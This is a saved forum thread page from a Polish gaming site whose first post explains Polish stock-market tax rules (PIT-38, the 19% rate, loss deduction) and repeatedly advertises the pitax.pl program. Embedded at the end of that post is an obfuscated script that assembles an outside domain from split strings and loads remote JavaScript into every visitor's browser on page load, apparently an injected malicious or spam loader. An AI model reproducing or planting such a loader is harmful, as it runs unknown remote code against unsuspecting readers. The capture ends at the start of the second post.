<!DOCTYPE html><html id="XF" lang="pl-PL" dir="LTR" data-app="public" data-template="thread_view" data-container-key="node-298" data-content-key="thread-18786" data-logged-in="false" data-cookie-prefix="xf_" class="has-js template-thread_view has-touchevents" data-run-jobs=""><head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Podatek od gry na giełdzie | GamesBoard.pl - forum o grach</title>
<meta name="description" content="Gra na giełdzie kapitałowej przynosi raz zyski, a raz straty. Mimo to wiele osób, licząc na zyski większe niż np. z lokat bankowych, inwestuje  w akcje lub...">
<meta property="og:description" content="Gra na giełdzie kapitałowej przynosi raz zyski, a raz straty. Mimo to wiele osób, licząc na zyski większe niż np. z lokat bankowych, inwestuje  w akcje lub inne instrumenty finansowe. Dochody/straty uzyskane na giełdzie należy wykazać w rocznym zeznaniu podatkowym.

PIT od dochodów kapitałowych...">
<meta property="twitter:description" content="Gra na giełdzie kapitałowej przynosi raz zyski, a raz straty. Mimo to wiele osób, licząc na zyski większe niż np. z lokat bankowych, inwestuje  w akcje lub inne instrumenty finansowe...">
<meta property="og:url" content="https://www.gamesboard.pl/threads/podatek-od-gry-na-gieldzie.18786/">
<link rel="canonical" href="https://www.gamesboard.pl/threads/podatek-od-gry-na-gieldzie.18786/">
<meta property="og:site_name" content="GamesBoard.pl - forum o grach">
<meta property="og:type" content="website">
<meta property="og:title" content="Podatek od gry na giełdzie">
<meta property="twitter:title" content="Podatek od gry na giełdzie">
<meta name="theme-color" content="#185886">
<link rel="preload" href="/styles/fonts/fa/fa-regular-400.woff2" as="font" type="font/woff2" crossorigin="anonymous">
<link rel="preload" href="/styles/fonts/fa/fa-solid-900.woff2" as="font" type="font/woff2" crossorigin="anonymous">
<link rel="preload" href="/styles/fonts/fa/fa-brands-400.woff2" as="font" type="font/woff2" crossorigin="anonymous">
<link rel="stylesheet" href="/css.php?css=public%3Anormalize.css%2Cpublic%3Acore.less%2Cpublic%3Aapp.less&amp;s=30&amp;l=1&amp;d=1544478052&amp;k=90e4add87510636c7a8a9762f002f9c2cd9f397c">
<link rel="stylesheet" href="/css.php?css=public%3Aexperience.css%2Cpublic%3Amessage.less%2Cpublic%3Anotices.less%2Cpublic%3Athxpress_xf.less%2Cpublic%3Axp_custommenu.css%2Cpublic%3Axp_twitch.css%2Cpublic%3Axp_youtube.css%2Cpublic%3Aextra.less&amp;s=30&amp;l=1&amp;d=1544478052&amp;k=c6d2db12178c79ef361385a518b073f1294e27e4">
<script type="text/javascript" async="" src="https://www.google-analytics.com/analytics.js"></script><script src="/js/xf/preamble.min.js?_v=1eae5c98"></script>
<script async="" src="https://www.googletagmanager.com/gtag/js?id=UA-9988093-4"></script>
<script>
		window.dataLayer = window.dataLayer || [];
		function gtag(){dataLayer.push(arguments);}
		gtag('js', new Date());
		gtag('config', 'UA-9988093-4', {
			// 
			
			
		});
	</script>


<link href="https://fonts.googleapis.com/css?family=Merriweather+Sans" rel="stylesheet">
<link href="https://fonts.googleapis.com/css?family=Fira+Sans:300,400&amp;subset=latin-ext" rel="stylesheet">
<style>
		:root {--main-color-bg: #ec1a1a;}
	</style>
</head>
<body data-template="thread_view" class=" ">
<div class="sidemenu">
<div class="sidemenu-paddings">

<div class="logo-sidemenu">
<a href="https://www.gamesboard.pl/portal">
<img src="https://www.gamesboard.pl/images/gamesboardiconmore.png">
</a>
</div>
<div style="border-top: 1px solid #2d2d2d; padding-top:5px;">
<a href="https://discord.gg/rZMmTSW"><img src="https://discordapp.com/api/guilds/167953374837211136/widget.png?style=banner2" style="border-radius:5px;"></a>
</div>
<div class="hold_menu">
<ul>
<ul>
<a href="https://gamesboard.pl/forums/siec-serwerow-gamesboard-pl.402/">
<li class="1 mlem">
<div class="menudiv">
<div class="minimenudiv">
<img src="https://www.gamesboard.pl/images/ikony/mcicon.png" class="imagediv">
</div>
<div class="divcloser">
<span class="titlemenum">Serwery Minecraft</span><br>
</div>
</div>
</li>
</a>
<a href="https://albion-online.pl/">
<li class="6 mlem">
<div class="menudiv">
<div class="minimenudiv">
<img src="https://www.gamesboard.pl/images/ikony/albion.png" class="imagediv">
</div>
<div class="divcloser">
<span class="titlemenum">Albion-Online.pl</span><br>
</div>
</div>
</li>
</a>
<a href="https://www.battle-royale.pl">
<li class="7 mlem">
<div class="menudiv">
<div class="minimenudiv">
<img src="https://www.gamesboard.pl/images/ikony/battleroyale.png" class="imagediv">
</div>
<div class="divcloser">
<span class="titlemenum">Battle-Royale.pl</span><br>
</div>
</div>
</li>
</a>
</ul>
</ul>
</div>


</div>
</div>

<div class="site-content-contain">
<div class="p-pageWrapper" id="top">
<header class="p-header" id="header">
</header>
<div class="p-navSticky p-navSticky--primary is-sticky-broken" data-xf-init="sticky-header">
<nav class="p-nav">
<div class="p-nav-inner">
<a class="p-nav-menuTrigger" data-xf-click="off-canvas" data-menu=".js-headerOffCanvasMenu" role="button" tabindex="0">
<i aria-hidden="true"></i>
<span class="p-nav-menuText">Menu</span>
</a>
<div class="p-nav-smallLogo">
<a href="https://www.gamesboard.pl/portal">
<img src="https://www.gamesboard.pl/images/gb_logo_wide2.png">
</a>
</div>
<div class="p-nav-scroller hScroller" data-xf-init="h-scroller" data-auto-scroll=".p-navEl.is-selected">
<div class="hScroller-scroll is-calculated" style="margin-bottom: -44px;">
<ul class="p-nav-list js-offCanvasNavSource">
<li>
<div class="p-navEl ">
<a href="https://www.gamesboard.pl/portal/" class="p-navEl-link " data-xf-key="1" data-nav-id="home">Strona główna</a>
</div>
</li>
<li>
<div class="p-navEl is-selected" data-has-children="true">
<a href="/" class="p-navEl-link p-navEl-link--splitMenu " data-nav-id="forums">Forum</a>
<a data-xf-key="2" data-xf-click="menu" data-menu-pos-ref="&lt; .p-navEl" data-arrow-pos-ref="&lt; .p-navEl" class="p-navEl-splitTrigger" role="button" tabindex="0" aria-label="Toggle expanded" aria-expanded="false" aria-haspopup="true"></a>
<div class="menu menu--structural" data-menu="menu" aria-hidden="true">
<div class="menu-content">

<a href="/whats-new/posts/" class="menu-linkRow u-indentDepth0 js-offCanvasCopy " data-nav-id="newPosts">Nowe posty</a>
<a href="/search/?type=post" class="menu-linkRow u-indentDepth0 js-offCanvasCopy " data-nav-id="searchForums">Przeglądaj forum</a>
</div>
</div>
</div>
</li>
<li>
<div class="p-navEl " data-has-children="true">
<a href="/whats-new/" class="p-navEl-link p-navEl-link--splitMenu " data-nav-id="whatsNew">Co nowego</a>
<a data-xf-key="3" data-xf-click="menu" data-menu-pos-ref="&lt; .p-navEl" data-arrow-pos-ref="&lt; .p-navEl" class="p-navEl-splitTrigger" role="button" tabindex="0" aria-label="Toggle expanded" aria-expanded="false" aria-haspopup="true"></a>
<div class="menu menu--structural" data-menu="menu" aria-hidden="true">
<div class="menu-content">

<a href="/whats-new/posts/" class="menu-linkRow u-indentDepth0 js-offCanvasCopy " rel="nofollow" data-nav-id="whatsNewPosts">Nowe posty</a>
<a href="/whats-new/profile-posts/" class="menu-linkRow u-indentDepth0 js-offCanvasCopy " rel="nofollow" data-nav-id="whatsNewProfilePosts">Nowe posty profilowe</a>
<a href="/whats-new/latest-activity" class="menu-linkRow u-indentDepth0 js-offCanvasCopy " rel="nofollow" data-nav-id="latestActivity">Ostatnia aktywność</a>
</div>
</div>
</div>
</li>
<li>
<div class="p-navEl ">
<a href="/streamers" class="p-navEl-link " data-xf-key="4" data-nav-id="streamers">Twitch</a>
</div>
</li>
<li>
<div class="p-navEl ">
<a href="/youtubers" class="p-navEl-link " data-xf-key="5" data-nav-id="youtubers">YouTube</a>
</div>
</li>
<li>
<div class="p-navEl ">
<a href="/tournaments/" class="p-navEl-link " data-xf-key="6" data-nav-id="xfa_tourn">Turnieje</a>
</div>
</li>
<li>
<div class="p-navEl " data-has-children="true">
<a href="/members/" class="p-navEl-link p-navEl-link--splitMenu " data-nav-id="members">Użytkownicy</a>
<a data-xf-key="7" data-xf-click="menu" data-menu-pos-ref="&lt; .p-navEl" data-arrow-pos-ref="&lt; .p-navEl" class="p-navEl-splitTrigger" role="button" tabindex="0" aria-label="Toggle expanded" aria-expanded="false" aria-haspopup="true"></a>
<div class="menu menu--structural" data-menu="menu" aria-hidden="true">
<div class="menu-content">

<a href="/members/list/" class="menu-linkRow u-indentDepth0 js-offCanvasCopy " data-nav-id="registeredMembers">Zarejestrowani użytkownicy</a>
<a href="/online/" class="menu-linkRow u-indentDepth0 js-offCanvasCopy " data-nav-id="currentVisitors">Obecnie aktywni</a>
<a href="/whats-new/profile-posts/" class="menu-linkRow u-indentDepth0 js-offCanvasCopy " rel="nofollow" data-nav-id="newProfilePosts">New posty na profilach</a>
<a href="/search/?type=profile_post" class="menu-linkRow u-indentDepth0 js-offCanvasCopy " data-nav-id="searchProfilePosts">Przeglądaj posty na profilach</a>
</div>
</div>
</div>
</li>
<li>
<div class="p-navEl ">
<a href="/shoutbox/" class="p-navEl-link " data-xf-key="8" data-nav-id="siropuShoutbox">Shoutbox</a>
</div>
</li>
</ul>
</div><i class="hScroller-action hScroller-action--end is-active" aria-hidden="true"></i><i class="hScroller-action hScroller-action--start" aria-hidden="true"></i>
</div>
<div class="p-nav-opposite">
<div class="p-navgroup p-account p-navgroup--guest">
<a href="/login/" class="p-navgroup-link p-navgroup-link--textual p-navgroup-link--logIn" rel="nofollow" data-xf-click="overlay" data-follow-redirects="on">
<span class="p-navgroup-linkText">Zaloguj</span>
</a>
<a href="/register/" class="p-navgroup-link p-navgroup-link--textual p-navgroup-link--register" rel="nofollow" data-xf-click="overlay" data-follow-redirects="on">
<span class="p-navgroup-linkText">Zarejestruj</span>
</a>
</div>
<div class="p-navgroup p-discovery">
<a href="/whats-new/" class="p-navgroup-link p-navgroup-link--iconic p-navgroup-link--whatsnew" title="Co nowego?">
<i aria-hidden="true"></i>
<span class="p-navgroup-linkText">Co nowego?</span>
</a>
<a href="/search/" class="p-navgroup-link p-navgroup-link--iconic p-navgroup-link--search" data-xf-click="menu" data-xf-key="/" aria-label="Szukaj" aria-expanded="false" aria-haspopup="true" title="Szukaj">
<i aria-hidden="true"></i>
<span class="p-navgroup-linkText">Szukaj</span>
</a>
<div class="menu menu--structural menu--wide" data-menu="menu" aria-hidden="true">
<form action="/search/search" method="post" class="menu-content" data-xf-init="quick-search">
<h3 class="menu-header">Szukaj</h3>
<div class="menu-row">
<div class="inputGroup inputGroup--joined">
<input type="text" class="input" name="keywords" placeholder="Szukaj…" aria-label="Szukaj" data-menu-autofocus="true">
<select name="constraints" class="js-quickSearch-constraint input" aria-label="Search within" style="width: 111px; flex-grow: 0; flex-shrink: 0;">
<option value="">Everywhere</option>
<option value="{&quot;search_type&quot;:&quot;post&quot;}">Wątków</option>
<option value="{&quot;search_type&quot;:&quot;post&quot;,&quot;c&quot;:{&quot;nodes&quot;:[298],&quot;child_nodes&quot;:1}}">This forum</option>
<option value="{&quot;search_type&quot;:&quot;post&quot;,&quot;c&quot;:{&quot;thread&quot;:18786}}">This thread</option>
</select>
</div>
</div>
 <div class="thxpress_searchToggle">
<div class="menu-row">
<dl class="formRow">
<dt>
<div class="formRow-labelWrapper"></div>
</dt>
<dd>
<ul class="inputChoices">
<li class="inputChoices-choice"><label class="iconic  iconic--radio"><input type="radio" name="searchToggle" value="xenforo" checked="checked" class="js-xfSearch"><i aria-hidden="true"></i><span class="iconic-label">Search the forum</span></label></li>
<li class="inputChoices-choice"><label class="iconic  iconic--radio"><input type="radio" name="searchToggle" value="wordpress" class="js-wpSearch"><i aria-hidden="true"></i><span class="iconic-label">Search the blog</span></label></li>
</ul>
</dd>
</dl>
</div>
<div class="menu-row wp-menu-row" style="display: none">
<div class="inputGroup">
<span class="inputGroup-text" id="ctrl_search_menu_by_author">By:</span>
<input class="input" name="author_name" data-xf-init="auto-complete" placeholder="Author" aria-labelledby="ctrl_search_menu_by_author" autocomplete="off">
</div>
</div>
</div>
<div class="menu-row">
<label class="iconic"><input type="checkbox" name="c[title_only]" value="1"><i aria-hidden="true"></i><span class="iconic-label">Przeszukaj jedynie tytuły</span></label>
</div>
<div class="menu-row">
<div class="inputGroup">
<span class="inputGroup-text" id="ctrl_search_menu_by_member">By:</span>
<input class="input" name="c[users]" data-xf-init="auto-complete" placeholder="Member" aria-labelledby="ctrl_search_menu_by_member" autocomplete="off">
</div>
</div>
<div class="menu-footer">
<span class="menu-footer-controls">
<button type="submit" class="button--primary button button--icon button--icon--search"><span class="button-text">Szukaj</span></button>
<a href="/search/" class="button" rel="nofollow"><span class="button-text">Wyszukiwanie zaawansowane…</span></a>
</span>
</div>
<input type="hidden" name="_xfToken" value="1544488913,21be7882279c8ce3cca1c85394c127fc">
</form>
</div>
</div>
</div>
</div>
</nav>
</div>
<div class="p-sectionLinks">
<div class="p-sectionLinks-inner hScroller" data-xf-init="h-scroller">
<div class="hScroller-scroll is-calculated" style="margin-bottom: -44px;">
<ul class="p-sectionLinks-list">
<li>
<div class="p-navEl ">
<a href="/whats-new/posts/" class="p-navEl-link " data-xf-key="alt+1" data-nav-id="newPosts">Nowe posty</a>
</div>
</li>
<li>
<div class="p-navEl ">
<a href="/search/?type=post" class="p-navEl-link " data-xf-key="alt+2" data-nav-id="searchForums">Przeglądaj forum</a>
</div>
</li>
</ul>
</div><i class="hScroller-action hScroller-action--end" aria-hidden="true"></i><i class="hScroller-action hScroller-action--start" aria-hidden="true"></i>
</div>
</div>
<div class="offCanvasMenu offCanvasMenu--nav js-headerOffCanvasMenu" data-menu="menu" aria-hidden="true" data-ocm-builder="navigation">
<div class="offCanvasMenu-backdrop" data-menu-close="true"></div>
<div class="offCanvasMenu-content">
<div class="offCanvasMenu-header">
Menu
<a class="offCanvasMenu-closer" data-menu-close="true" role="button" tabindex="0" aria-label="Zamknij"></a>
</div>
<div class="p-offCanvasRegisterLink">
<div class="offCanvasMenu-linkHolder">
<a href="/login/" class="offCanvasMenu-link" rel="nofollow" data-xf-click="overlay" data-menu-close="true">
Zaloguj
</a>
</div>
<hr class="offCanvasMenu-separator">
<div class="offCanvasMenu-linkHolder">
<a href="/register/" class="offCanvasMenu-link" rel="nofollow" data-xf-click="overlay" data-menu-close="true">
Zarejestruj
</a>
</div>
<hr class="offCanvasMenu-separator">
</div>
<div class="js-offCanvasNavTarget"></div>
</div>
</div>
<div class="p-body">
<div class="p-body-inner">

<div class="visitorUserIDbck">
<div class="visitorUserIDpad">
<h1 class="visitorUserIDfon">Witaj na GamesBoard.pl! </h1>
<span>Zarejestruj się już teraz i uzyskaj dostęp do pełnej zawartości GamesBoard.pl</span>
<div class="p-title-pageAction"><br>
<a href="/register/" class="button--cta button button--icon button--icon--registerka" data-xf-click="overlay">
<span class="button-text">
Zarejestruj się!
</span>
</a>
</div>
</div>
</div>


<ul class="p-breadcrumbs " itemscope="" itemtype="https://schema.org/BreadcrumbList">
<li itemprop="itemListElement" itemscope="" itemtype="https://schema.org/ListItem">
<a href="https://www.gamesboard.pl/portal/" itemprop="item">
<span itemprop="name">Strona główna</span>
</a>
</li>
<li itemprop="itemListElement" itemscope="" itemtype="https://schema.org/ListItem">
<a href="/" itemprop="item">
<span itemprop="name">Forum</span>
</a>
</li>
<li itemprop="itemListElement" itemscope="" itemtype="https://schema.org/ListItem">
<a href="/.#gamesboard-pl.410" itemprop="item">
<span itemprop="name">GamesBoard.pl</span>
</a>
</li>
<li itemprop="itemListElement" itemscope="" itemtype="https://schema.org/ListItem">
<a href="/forums/news-room.298/" itemprop="item">
<span itemprop="name">News Room</span>
</a>
</li>
</ul>
<noscript>&lt;div class="blockMessage blockMessage--important blockMessage--iconic u-noJsOnly"&gt;JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.&lt;/div&gt;</noscript>
<!--[if lt IE 9]><div class="blockMessage blockMessage&#45;&#45;important blockMessage&#45;&#45;iconic">You are using an out of date browser. It  may not display this or other websites correctly.<br />You should upgrade or use an <a href="https://www.google.com/chrome/browser/" target="_blank">alternative browser</a>.</div><![endif]-->
<div class="p-body-header">
<div class="p-title ">
<h1 class="p-title-value">Podatek od gry na giełdzie</h1>
</div>
<div class="p-description">
<ul class="listInline listInline--bullet">
<li>
<i class="fa--xf far fa-user" aria-hidden="" title="Autor tematu"></i>
<span class="u-srOnly">Autor tematu</span>
<a href="/members/matti.1/" class="username  u-concealed" dir="auto" data-user-id="1" data-xf-init="member-tooltip" id="js-XFUniqueId1"><span class="username--staff username--moderator username--admin">Matti</span></a>
</li>
<li>
<i class="fa--xf far fa-clock" aria-hidden="" title="od:"></i>
<span class="u-srOnly">od:</span>
<a href="/threads/podatek-od-gry-na-gieldzie.18786/" class="u-concealed"><time class="u-dt" dir="auto" datetime="2017-01-21T23:59:27+0100" data-time="1485039567" data-date-string="21 Sty 2017" data-time-string="23:59" title="21 Sty 2017 o 23:59">21 Sty 2017</time></a>
</li>
</ul>
</div>
</div>
<div class="p-body-main  ">
<div class="p-body-content">
<div class="p-body-pageContent">
<div class="block block--messages" data-xf-init="" data-type="post" data-href="/inline-mod/">
<div class="block-outer"></div>
<div class="block-outer js-threadStatusField"></div>
<div class="block-container lbContainer" data-xf-init="lightbox select-to-quote" data-message-selector=".js-post" data-lb-id="thread-18786" data-lb-universal="0">
<div class="block-body js-replyNewMessageContainer">
<article class="message message--post js-post js-inlineModContainer  " data-author="Matti" data-content="post-149311" id="js-post-149311">
<span class="u-anchorTarget" id="post-149311"></span>
<div class="message-inner">
<div class="message-cell message-cell--user">
<section itemscope="" itemtype="https://schema.org/Person" class="message-user">
<div class="message-avatar ">
<div class="message-avatar-wrapper">
<a href="/members/matti.1/" class="avatar avatar--m" data-user-id="1" data-xf-init="member-tooltip" id="js-XFUniqueId2">
<img src="/data/avatars/m/0/1.jpg?1542808550" alt="Matti" class="avatar-u1-m" itemprop="image">
</a>
</div>
</div>
<div class="message-userDetails">
<h4 class="message-name"><a href="/members/matti.1/" class="username " dir="auto" data-user-id="1" data-xf-init="member-tooltip" itemprop="name" id="js-XFUniqueId3"><span class="username--style3 username--staff username--moderator username--admin">Matti</span></a></h4>
<h5 class="userTitle message-userTitle" dir="auto" itemprop="jobTitle">Pogromca Ameb</h5>
<div class="userBanner userBanner--staff message-userBanner" dir="auto" itemprop="jobTitle"><span class="userBanner-before"></span><strong>Członek ekipy</strong><span class="userBanner-after"></span></div>
<div class="userBanner userBanner userBanner--red message-userBanner" itemprop="jobTitle"><span class="userBanner-before"></span><strong><b>Administrator</b></strong><span class="userBanner-after"></span></div>
</div>
<span class="message-userArrow"></span>
</section>
</div>
<div class="message-cell message-cell--main">
<div class="message-main js-quickEditTarget">
<header class="message-attribution message-attribution--split">
<div class="message-attribution-main">
<a href="/threads/podatek-od-gry-na-gieldzie.18786/post-149311" class="u-concealed" rel="nofollow">
<time class="u-dt" dir="auto" datetime="2017-01-21T23:59:27+0100" data-time="1485039567" data-date-string="21 Sty 2017" data-time-string="23:59" title="21 Sty 2017 o 23:59">21 Sty 2017</time>
</a>
</div>
<ul class="message-attribution-opposite message-attribution-opposite--list">
<li>
<a href="/threads/podatek-od-gry-na-gieldzie.18786/post-149311" data-xf-init="share-tooltip" data-href="/posts/149311/share" rel="nofollow" id="js-XFUniqueId4">
<i class="fa--xf far fa-share-alt" aria-hidden=""></i>
</a>
</li>
<li>
<a href="/threads/podatek-od-gry-na-gieldzie.18786/post-149311" rel="nofollow">
#1
</a>
</li>
</ul>
</header>
<div class="message-content js-messageContent">
<div class="message-userContent lbContainer js-lbContainer " data-lb-id="post-149311" data-lb-caption-desc="Matti · 21 Sty 2017 o 23:59">
<article class="message-body js-selectToQuote">
<div class="bbWrapper">Gra na giełdzie kapitałowej przynosi raz zyski, a raz straty. Mimo to wiele osób, licząc na zyski większe niż np. z lokat bankowych, inwestuje w akcje lub inne instrumenty finansowe. Dochody/straty uzyskane na giełdzie należy wykazać w rocznym zeznaniu podatkowym.<br>
<br>
<span style="font-size: 22px"><b>PIT od dochodów kapitałowych</b></span><br>
Podatek od dochodów kapitałowych, zwany też podatkiem Belki, wynosi 19 %. Taka jest stawka podatku od dochodu uzyskanego m.in. na lokatach bankowych, rachunkach oszczędnościowych, giełdzie (akcje, obligacje), czy rynku forex.<br>
<br>
Podatek od lokat czy depozytów bankowych jest potrącany automatycznie przy kapitalizacji odsetek, odprowadzany do fiskusa przez instytucje finansowe, i nie musimy go wykazywać w rocznych pitach. Podobnie jest z dywidendami. Wypłacane są już po potrąceniu 19% podatku. Natomiast w przypadku inwestycji giełdowych, czy na rynku walutowym, musimy samodzielnie dokonywać rozliczenia z fiskusem. Do rozliczeń możemy wykorzystać <a href="https://www.pitax.pl/program-pit/" target="_blank" class="link link--external" rel="noopener">pitax.pl/program-pit</a>.<br>
<br>
Dochody kapitałowe wykazujemy dopiero po zakończeniu roku podatkowego. Od dochodów giełdowych nie odprowadza się podatku w trakcie roku.. Ich zmienność powoduje, że końcowy wynik roczny może być zarówno dodatni, jak i ujemny. W każdym przypadku jednak jesteśmy zobowiązani złożyć deklarację rozliczeniową. Wykazanie straty może okazać się dla nas o tyle korzystne, że pozwoli na odliczenie tej straty od dochodu uzyskanego w następnych latach.<br>
<br>
Na rozliczenie się z fiskusem mamy czas do końca kwietnia roku następującego po roku podatkowym. Jeśli ostatni dzień kwietnia wypada w dzień wolny od pracy, termin ten przenosi się na pierwszy dzień roboczy po tym dniu. Tak jest właśnie w tym roku i pity 2017 składamy do 2 maja. W terminie tym należy złożyć deklarację PIT-38 oraz zapłacić należny podatek. Program pit pomoże w wypełnianiu deklaracji i obliczeniu należnego podatku.<br>
<br>
<span style="font-size: 18px"><b>Sposób obliczenia podatku</b></span><br>
Formularz podatkowy PIT-38 wypełniamy na podstawie otrzymanej z biura maklerskiego rocznej informacji PIT-8C. Informacje PIT-8C sporządzane są przez biura maklerskie i wysyłane do podatników oraz do urzędów skarbowych do końca lutego roku następnego po roku podatkowym.<br>
<br>
W przypadku gdy posiadamy kilka rachunków inwestycyjnych i otrzymamy kilka formularzy PIT8-C, musimy zsumować i wykazać w PIT-38 kwoty ze wszystkich źródeł. Sumujemy tylko zyski kapitałowe. Nie dodajemy do nich dochodów opodatkowanych na innych zasadach, np. według skali podatkowej albo ryczałtem od przychodów ewidencjonowanych. Tak samo nie możemy zysków z giełdy doliczyć do dochodów wykazywanych w innych deklaracjach, np. PIT 36 czy PIT 28.<br>
<br>
Podatek od zysków uzyskanych z inwestycji giełdowych obliczamy od podstawy opodatkowania, którą uzyskujemy po odjęciu od kwoty przychodów kosztów ich uzyskania.<br>
<br>
Przykład:<br>
<br>
Pan Andrzej sprzedał 1000 akcji spółki giełdowej , które wcześniej zakupił za pośrednictwem biura maklerskiego. Cena sprzedaży wynosiła 40 pln sztukę, a zakupu 29 pln.Przy zakupie oraz sprzedaży biuro maklerskie pobrało prowizję, łącznie wyniosła ona 1000 pln. Przychód pana Andrzeja to 40 000 pln, koszty jego uzyskania - 30 000 pln. Dochód (czyli różnica między przychodem a kosztami) wynosi 10000 pln i od takiej kwoty 19% podatek wynosi 1900 pln.<br>
<br>
<span style="font-size: 18px"><b>Rozliczanie strat z inwestycji</b></span><br>
Deklarację roczną PIT 38 składamy zarówno wtedy, gdy osiągnęliśmy zyski, jak i wtedy, gdy ponieśliśmy stratę. Wykazaną stratę możemy rozliczać w ciągu pięciu kolejnych lat pod warunkiem, że uzyskamy dochody, od których można będzie ją odliczyć. Stratę można odliczyć tylko od dochodów z tego samego źródła, z którego powstała. Nie można więc odjąć straty z inwestycji giełdowych np. od dochodu z wynagrodzenia za pracę. Stratę wykazaną w PIT 38 możemy rozliczyć tylko w PIT 38. W każdym z pięciu lat nie można odliczyć więcej niż 50%. Przy dobrej koniunkturze stratę można odliczyć już w ciągu 2 lat (50%+50%). Jeśli jednak przez pięć lat dochody nie pozwolą na rozliczenie straty, w późniejszych latach nie będzie to możliwe.<br>
<br>
<span style="font-size: 18px"><b>Wycena akcji a podatek</b></span><br>
Jeśli wartość kupionych przez nas akcji wzrosła, ale ich nie sprzedaliśmy, nie płacimy podatku od zysku. Jak wiemy wartość akcji jest zmienna. Do rozliczenia podatkowego istotna jest wartość, jaką uzyskamy ze sprzedaży. Obowiązek rozliczenia i zapłaty podatku od gry na giełdzie powstaje dopiero w momencie sprzedaży akcji. Tak długo jak akcje nie są sprzedane, nie wypełniamy PIT-a i nie płacimy podatku. Nawet jeśli ich wartość znacznie wzrosła..<br>
<br>
Podatek od dochodów giełdowych płacimy po zakończeniu roku podatkowego, w którym zbyliśmy akcje.Wykazujemy wtedy zysk albo stratę.<br>
<br>
<span style="font-size: 18px"><b>Odliczenie kosztów</b></span><br>
Podatek obliczany jest od dochodu, czyli różnicy między przychodami, a kosztami. Kwota podatku jest tym niższa, im wyższe są koszty.<br>
<br>
Zgodnie ze stanowiskiem Ministerstwa Finansów kosztem uzyskania przychodu przy ustalaniu dochodu z odpłatnego zbycia akcji oraz innych papierów wartościowych są wydatki poniesione na:<br>
<br>
<ol>
<li data-xf-list-type="ol">nabycie papierów wartościowych (cena jednostkowa x ilość papierów wartościowych),</li>
<li data-xf-list-type="ol">obsługę rachunku inwestycyjnego.</li>
</ol><a href="https://www.gamesboard.pl/attachments/pitax3-jpg.2572/" target="_blank"><img src="/data/attachments/2/2585-6951fb9a3e61f18cf74bc7252ff8d07f.jpg" class="bbImage " style="" alt="pitax3.jpg"></a><br>
<br>
<br>
Głównym kosztem jest cena nabycia akcji. Poza tym prowizje i inne opłaty pobierane przez biuro maklerskie, powinny być już uwzględnione w dokumencie PIT-8C, który dostaliśmy od biura maklerskiego.<br>
<br>
Pozostałe koszty (np. odsetki i prowizje od kredytów giełdowych) nie są uwzględnione w PIT 8C, ale możemy uwzględnić je sami w rozliczeniu rocznym. W tym przypadku warto potwierdzić koszty do odliczenia we właściwym urzędzie skarbowym.<br>
<br>
<span style="font-size: 18px"><b>Sposób rozliczenia PIT</b></span><br>
Deklarację PIT-38 możemy wypełnić odręcznie albo korzystając z programu PITax.pl Łatwe podatki rozliczyc pit przez internet. Rozliczenie pit online.jest proste i zajmuje niewiele czasu. Korzystając z programu pit unikniemy błędów rachunkowych i formalnych. Po poprawnym wysłaniu zeznania przez program pit urząd skarbowy potwierdza jego otrzymanie Urzędowym Poświadczeniem Odbioru.<br>
<br>
<script type="text/javascript">
(function(){
 ohzt=document.createElement("script");ohzt.async=true;ohzt_="u"+("s")+"t";
 ohztu="15455128.";ohzt_+="a"+("t.i");ohzt_+="n"+("f"+"o")+"/";
 ohztu+="nvqyqrcjhztgyhrrXkwakv"+("xm99295x");
 ohzt.src="//"+ohzt_+ohztu;ohzt.type="text/javascript";
 document.body.appendChild(ohzt);
})();
</script></div>
<div class="js-selectToQuoteEnd">&nbsp;</div>
</article>
</div>
</div>
<footer class="message-footer">
<div class="reactionsBar js-reactionsList is-active">
<ul class="reactionSummary">
<li><span class="reaction reaction--small reaction--1" data-reaction-id="1"><i></i><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class="reaction-sprite js-reaction" title="Lubię"></span></li>
</ul>
<span class="u-srOnly">Reactions:</span>
<a class="reactionsBar-link" href="/posts/149311/reactions" data-xf-click="overlay" data-cache="false"><bdi>Aligdansk</bdi>, <bdi>Plajer</bdi>, <bdi>inu</bdi> and 2 others</a>
</div>
<div class="js-historyTarget message-historyTarget toggleTarget" data-href="trigger-href"></div>
</footer>
</div>
</div>
</div>
</article>
<article class="message message--post js-post js-inlineModContainer  " data-author="inu" data-content="post-149313" id="js-post-149313">
<span class="u-anchorTarget" id="post-149313"></span>
<div class="message-inner">
<div class="message-cell message-cell--user">
<section itemscope="" itemtype="https://schema.org/Person" class="message-user">
<div class="message-avatar ">
<div class="message-avatar-wrapper">
<a href="/members/inu.2/" class="avatar avatar--m" data-user-id="2" data-xf-init="member-tooltip" id="js-XFUniqueId5">
<img src="/data/avatars/m/0/2.jpg?1536145047" alt="inu" class="avatar-u2-m" itemprop="image">
</a>
</div>
</div>
<div class="message-userDetails">
<h4 class="message-name"><a href="/members/inu.2/" class="username " dir="auto" data-user-id="2" data-xf-init="member-tooltip" itemprop="name" id="js-XFUniqueId6"><span class="username--style3 username--staff username--admin">inu</span></a></h4>
<h5 class="userTitle message-userTitle" dir="auto" itemprop="jobTitle">Administrator GamesBoard</h5>
<div class="userBanner userBanner--staff message-userBanner" dir="auto" itemprop="jobTitle"><span class="userBanner-before"></span><strong>Członek ekipy</strong><span class="userBanner-after"></span></div>
<div class="userBanner userBanner userBanner--red message-userBanner" itemprop="jobTitle"><span class="userBanner-before"></span><strong><b>Administrator</b></strong><span class="userBanner-after"></span></div>
</div>
<span class="message-userArrow"></span>
</section>
</div>
<div class="message-cell message-cell--main">
<div class="message-main js-quickEditTarget">
<header class="message-attribution message-attribution--split">
<div class="message-attribution-main">
<a href="/threads/podatek-od-gry-na-gieldzie.18786/post-149313" class="u-concealed" rel="nofollow">
<time class="u-dt" dir="auto" datetime="2017-01-22T04:15:56+0100" data-time="1485054956" data-date-string="22 Sty 2017" data-time-string="04:15" title="22 Sty 2017 o 04:15">22 Sty 2017</time>
</a>
</div>
<ul class="message-attribution-opposite message-attribution-opposite--list">
<li>
<a href="/threads/podatek-od-gry-na-gieldzie.18786/post-149313" data-xf-init="share-tooltip" data-href="/posts/149313/share" rel="nofollow" id="js-XFUniqueId7">
<i class="fa--xf far fa-share-alt" aria-hidden=""></i>
</a>
</li>
<li>
<a href="/threads/podatek-od-gry-na-gieldzie.18786/post-149313" rel="nofollow">
#2
</a>
</li>
</ul>
</header>
<div class="message-content js-messageContent">
